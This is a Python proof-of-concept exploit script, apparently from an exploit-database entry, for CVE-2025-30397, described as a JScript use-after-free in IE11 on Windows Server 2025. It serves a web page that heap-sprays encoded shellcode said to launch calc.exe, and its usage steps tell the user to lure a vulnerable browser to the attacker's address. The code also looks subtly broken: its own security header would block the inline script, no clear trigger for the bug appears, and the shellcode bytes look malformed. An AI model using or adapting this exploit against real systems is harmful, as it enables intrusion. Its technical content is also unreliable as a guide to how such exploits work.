#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.
# ============================
# Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
# $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
# Open Internet Explorer and navigate to:
# http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================
import http.server
import socketserver
PORT = 8080
HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC - CVE-2025-30397</title>
<script>
var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (payload.length < 0x1000) payload += payload;
var shell = unescape(
"%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
"%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
"%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
"%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
"%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
"%u0065"
);
var final = payload + shell;
var buffer = [];
for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
var sprayTarget = document.createElement("iframe");
sprayTarget.setAttribute("src", "about:blank");
document.body.appendChild(sprayTarget);
for (var i = 0; i < 200; i++) {
try {
sprayTarget.contentWindow.eval("var a = '" + final + "'");
} catch (e) {}
}
for (var j = 0; j < 1000; j++) {
var obj = document.createElement("div");
obj.innerHTML = "EXPLOIT" + j;
document.body.appendChild(obj);
}
var victim = document.createElement("object");
victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
document.body.appendChild(victim);
alert("PoC loaded. If vulnerable, calc.exe will launch.");
</script>
</head>
<body>
<h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
<h2>Author: Mohammed Idrees Banyamer</h2>
<h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
<h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
<p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", str(len(HTML_CONTENT)))
self.send_header("X-Content-Type-Options", "nosniff")
self.send_header("X-Frame-Options", "SAMEORIGIN")
self.send_header("Content-Security-Policy", "default-src 'self'")
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
self.wfile.write(HTML_CONTENT)
else:
self.send_error(404, "File Not Found")
def run():
print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped.")
if __name__ == "__main__":
run()